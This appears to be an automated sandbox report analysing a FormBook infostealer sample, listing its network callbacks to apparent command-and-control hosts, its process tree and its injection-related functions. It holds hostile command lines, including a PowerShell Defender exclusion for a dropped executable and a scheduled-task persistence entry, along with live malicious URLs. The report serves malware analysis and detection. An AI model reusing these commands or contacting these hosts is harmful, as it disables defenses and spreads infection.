Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:45:49.914392948 CEST	173	OUT	GET /gy15/?RzuTsp=ojuzNIgvg1BwHmAcToIecm58HYsz0PWD/adWnxcLSOv/0CtFh7ct+QMG65Nx8hG2JCp7w1BwJA==&hL08qP=ojn0sl HTTP/1.1 Host: www.carmen-asa.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 26, 2024 12:45:50.371421099 CEST	214	IN	HTTP/1.1 301 Moved Permanently content-length: 0 location: https://www.carmen-asa.com/gy15/?RzuTsp=ojuzNIgvg1BwHmAcToIecm58HYsz0PWD/adWnxcLSOv/0CtFh7ct+QMG65Nx8hG2JCp7w1BwJA==&hL08qP=ojn0sl connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49727	3.33.130.190	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:46:10.322123051 CEST	186	OUT	GET /gy15/?RzuTsp=XHNRiWOL6AKBRIWnLgJD49myVGc8KkvpE41aN949WbE5iIv/qrJ/+jvCIwl+PYhctV8eVI3XMQ==&hL08qP=ojn0sl HTTP/1.1 Host: www.rs-alohafactorysaleuua.shop Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 26, 2024 12:46:10.798499107 CEST	352	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 26 Jul 2024 10:46:10 GMT Content-Type: text/html Content-Length: 212 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 52 7a 75 54 73 70 3d 58 48 4e 52 69 57 4f 4c 36 41 4b 42 52 49 57 6e 4c 67 4a 44 34 39 6d 79 56 47 63 38 4b 6b 76 70 45 34 31 61 4e 39 34 39 57 62 45 35 69 49 76 2f 71 72 4a 2f 2b 6a 76 43 49 77 6c 2b 50 59 68 63 74 56 38 65 56 49 33 58 4d 51 3d 3d 26 68 4c 30 38 71 50 3d 6f 6a 6e 30 73 6c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?RzuTsp=XHNRiWOL6AKBRIWnLgJD49myVGc8KkvpE41aN949WbE5iIv/qrJ/+jvCIwl+PYhctV8eVI3XMQ==&hL08qP=ojn0sl"}</script></head></html>

Target ID:	0
Start time:	06:44:51
Start date:	26/07/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe"
Imagebase:	0x9b0000
File size:	574'976 bytes
MD5 hash:	01FBCC6559C010E59BE1DC7B66C12E4F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:44:52
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KfYvtUBOq.exe"
Imagebase:	0x7f0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:44:52
Start date:	26/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:44:52
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp89CA.tmp"
Imagebase:	0xbe0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:44:52
Start date:	26/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:44:52
Start date:	26/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x700000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	06:44:53
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Roaming\KfYvtUBOq.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\KfYvtUBOq.exe
Imagebase:	0x9c0000
File size:	574'976 bytes
MD5 hash:	01FBCC6559C010E59BE1DC7B66C12E4F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 27%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	06:44:53
Start date:	26/07/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff609140000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000009.00000002.4589368880.000000000E3AE000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	06:44:54
Start date:	26/07/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff717f30000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	06:44:55
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp9563.tmp"
Imagebase:	0xbe0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	06:44:55
Start date:	26/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	06:44:55
Start date:	26/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x800000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	06:44:56
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\autoconv.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\autoconv.exe"
Imagebase:	0x60000
File size:	842'752 bytes
MD5 hash:	A705C2ACED7DDB71AFB87C4ED384BED6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	06:44:56
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\rundll32.exe"
Imagebase:	0x720000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	06:44:57
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\autochk.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\autochk.exe"
Imagebase:	0x1e0000
File size:	863'232 bytes
MD5 hash:	FC398299F54290D5F35C69E865FD7CC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	06:44:57
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\rundll32.exe"
Imagebase:	0x720000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	06:44:59
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	06:45:00
Start date:	26/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	177
Total number of Limit Nodes:	11

Executed Functions

Function 0730E3D9 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2162992422.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60eb626a5dc9729abf3a80e57fcbb1fd1c7693075836662d6a89a40fd228c177
Instruction ID: 1476c5c2b2979977eb8a40a690dab28a024daa47eeaec35f946d9bb0b9f88ea5
Opcode Fuzzy Hash: 60eb626a5dc9729abf3a80e57fcbb1fd1c7693075836662d6a89a40fd228c177
Instruction Fuzzy Hash: 17C09BE6FED004D5B5007C8474200F8E73DD68B121F1434B1D14E63D814111451541D5

Function 02B6D051 Relevance: 6.1, APIs: 4, Instructions: 129
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 02B6D0DE
GetCurrentThread.KERNEL32 ref: 02B6D11B
GetCurrentProcess.KERNEL32 ref: 02B6D158
GetCurrentThreadId.KERNEL32 ref: 02B6D1B1

Memory Dump Source

Source File: 00000000.00000002.2157532721.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b60000_SecuriteInfo.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: f19ee0f0277cc0f548cf812ba9cef9562a9d99fcdf34fe4fd6310905e171c023
Instruction ID: a9132ffef9e2b7ddccfe497bb36b9a9ae941b70c9e39fa743c68ddce9c2d3864
Opcode Fuzzy Hash: f19ee0f0277cc0f548cf812ba9cef9562a9d99fcdf34fe4fd6310905e171c023
Instruction Fuzzy Hash: A4515BB1A1134ACFDB14CFA9D548BEEBBF1EF48304F208459E059A7390DB789984CB65

Function 02B6D060 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 02B6D0DE
GetCurrentThread.KERNEL32 ref: 02B6D11B
GetCurrentProcess.KERNEL32 ref: 02B6D158
GetCurrentThreadId.KERNEL32 ref: 02B6D1B1

Memory Dump Source

Source File: 00000000.00000002.2157532721.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b60000_SecuriteInfo.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: c705511b4d3d2d57677c2c147f79cb935b5ed93d1f197b445f5fe23ad8c6a0d2
Instruction ID: 7e33767aac86ef11d2a3225ab6ceb4f4155272ed295849dad37d9d592a204eb7
Opcode Fuzzy Hash: c705511b4d3d2d57677c2c147f79cb935b5ed93d1f197b445f5fe23ad8c6a0d2
Instruction Fuzzy Hash: C95149B0A1130A8FDB14CFA9D548BEEBBF1EF48304F208459E459A7360DB789984CF65

Function 0730ABC4 Relevance: 1.7, APIs: 1, Instructions: 247
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0730AE06

Memory Dump Source

Source File: 00000000.00000002.2162992422.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_SecuriteInfo.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 7ba02aee6fd022d155f3463497770187b81fe29ef5e0cfb5a0ecfe4b072d5f8e
Instruction ID: 526f380a95a5fc4500a197d2b10aa3ffe506d41adba2465caa598e4cdd6d5b14
Opcode Fuzzy Hash: 7ba02aee6fd022d155f3463497770187b81fe29ef5e0cfb5a0ecfe4b072d5f8e
Instruction Fuzzy Hash: C2A15CB1D1035ADFEB20CF68D8517EDBBB2BF48310F1485A9E848A7280DB749985CF91

Function 0730ABD0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0730AE06

Memory Dump Source

Source File: 00000000.00000002.2162992422.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_SecuriteInfo.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 85084175f1e3dfd9c3870cef0e50b73d70a00fa6d37ccce704cfcd1bbe1a8c4f
Instruction ID: 7ca4980df9ba1f9f953b278cee1028b0d424fccb7bd1901963621010d47607ce
Opcode Fuzzy Hash: 85084175f1e3dfd9c3870cef0e50b73d70a00fa6d37ccce704cfcd1bbe1a8c4f
Instruction Fuzzy Hash: 9C915DB1D0035ADFEB10CF68D851BEDBBB2BF48310F1485A9E858A7280DB749985CF91

Function 02B6ADC8 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02B6B01E

Memory Dump Source

Source File: 00000000.00000002.2157532721.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b60000_SecuriteInfo.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 9ea464b63e2ae5ff8ad83f0ae6cba6815eca016a7042e0bb8e0b49a680e212d6
Instruction ID: dd96f4849fc4aec4f75fc9443bce34c4328dd4ae94a35b131c07ba1d4b1c3e85
Opcode Fuzzy Hash: 9ea464b63e2ae5ff8ad83f0ae6cba6815eca016a7042e0bb8e0b49a680e212d6
Instruction Fuzzy Hash: 95713670A00B058FDB24DF69D45876ABBF1FF88304F108A6DD48AE7A40DB79E845CB91

Function 02B6590D Relevance: 1.6, APIs: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02B659C9

Memory Dump Source

Source File: 00000000.00000002.2157532721.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b60000_SecuriteInfo.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e5e80118efcb676a568edc00218ae131b65a18cc6df465d32719ac0ef71ab57f
Instruction ID: a08e86e64153e97c20ceda8baae5fe4d2d88a3e3e2e4b10d5524b13a5b746866
Opcode Fuzzy Hash: e5e80118efcb676a568edc00218ae131b65a18cc6df465d32719ac0ef71ab57f
Instruction Fuzzy Hash: 2851E0B1C00719CFDB24CFA9C8897DEBBF5AF48304F2080AAD558AB251D7796949CF50

Function 02B644C4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02B659C9

Memory Dump Source

Source File: 00000000.00000002.2157532721.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b60000_SecuriteInfo.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 7581bfd17d27a006d0cf3ea0c906a9d637c5ea787c0f5ff7d8b793fc175d36f8
Instruction ID: 3dd2a415316ba82b6eb8e95642573cf503160a7e184a66b1ea2fd51a56f9b6a4
Opcode Fuzzy Hash: 7581bfd17d27a006d0cf3ea0c906a9d637c5ea787c0f5ff7d8b793fc175d36f8
Instruction Fuzzy Hash: 4241C2B0C0071DDBDB24CFA9C8847DDBBB5BF44704F6081AAD518AB251DB756945CF90

Function 0730A942 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0730A9D8

Memory Dump Source

Source File: 00000000.00000002.2162992422.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_SecuriteInfo.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 4c446e5610090c341dae880d080e2760536d4f0ede4b814af340f83900b6dc80
Instruction ID: ab91b186f7416ecacfa731abdf7af1aee8cccbef2558a8b52595a2889cf4e2b1
Opcode Fuzzy Hash: 4c446e5610090c341dae880d080e2760536d4f0ede4b814af340f83900b6dc80
Instruction Fuzzy Hash: 472146B59003499FDB10CFA9C981BEEBBF1FF48310F14882AE958A7251C7789954CBA4

Function 0730A948 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0730A9D8

Memory Dump Source

Source File: 00000000.00000002.2162992422.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_SecuriteInfo.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 2d8c100ed9667705810211e6588e075398dce718faf6c53e12c8588a0faddfdb
Instruction ID: 2e73515a42c8bc3863846be41f7699f255f7c9d00d6b3f37a7ca57ffc095646b
Opcode Fuzzy Hash: 2d8c100ed9667705810211e6588e075398dce718faf6c53e12c8588a0faddfdb
Instruction Fuzzy Hash: 4A2127B190035D9FDB10CFA9C885BDEBBF5FF88310F14842AE958A7240D7789950CBA4

Function 0730AA32 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0730AAB8

Memory Dump Source

Source File: 00000000.00000002.2162992422.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_SecuriteInfo.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 4273f24420ebe92b1b285fbb9ff64bd4ba7ea299e11212b7906afa21820aa614
Instruction ID: f38eba338f000e4ec38aae8b364606ec75d929bdd6e4a9ed61fce02bb35edf82
Opcode Fuzzy Hash: 4273f24420ebe92b1b285fbb9ff64bd4ba7ea299e11212b7906afa21820aa614
Instruction Fuzzy Hash: 8A2128B18003599FEB10DFAAC981AEEFBF5FF48320F148429E558A7251C7389951DBA4

Function 0730A7A8 Relevance: 1.6, APIs: 1, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0730A82E

Memory Dump Source

Source File: 00000000.00000002.2162992422.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7300000_SecuriteInfo.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: d30dabe2c43229028df6189cee1840e3030e6142b9c9d86ca26221aacfad267b
Instruction ID: e5b67a37ea4d3645b8ce618800acf88aa2f1520179a4c6a180af49577bfaf3d4
